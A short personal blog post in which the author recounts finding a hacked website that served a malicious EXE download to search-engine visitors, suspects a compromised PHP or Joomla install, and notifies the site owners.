While doing a search for something innocuous, I found a search result that was very out of place. The domain was nothing related to what I was searching for, and the text abstract was, to say the least, spammy. Although I know you’re not supposed to click things like that, I figure I’m pretty secure, so I clicked it.
I was immediately shown a page that said my download would start in 0 seconds, then I was prompted to download an EXE file. Uh huh. I browsed to the root domain and it really was a legitimate website. So now, I wanted to figure out how this happened. I navigated to the hacked page and I didn’t get any download prompt. I went back to the search results and clicked again – I got the download prompt. Hmmm. More attempts and sometimes the site would send me to a dead page.
I looked very hard at the source code and couldn’t find the script that was being injected, but I could see there was a comment <!–counter–> that was getting replaced with the download redirect. I did a site search on Bing and found many, many, many pages on their website that were suspect. Also, I saw actual website pages that were in PHP.
So, I had to conclude that the website had a hacked version of PHP, and if that was compromised, the server could do anything it wanted, including checking for referrers and replacing tags in the source code files. The best I could do was email them and let them know they were hacked and that they had to have their webmaster fix it for them.
Upon further research, it looks like it was a Joomla exploit from a couple of years ago. I passed that info along and hopefully the website owners can make the updates needed (and clean up all the extra pages).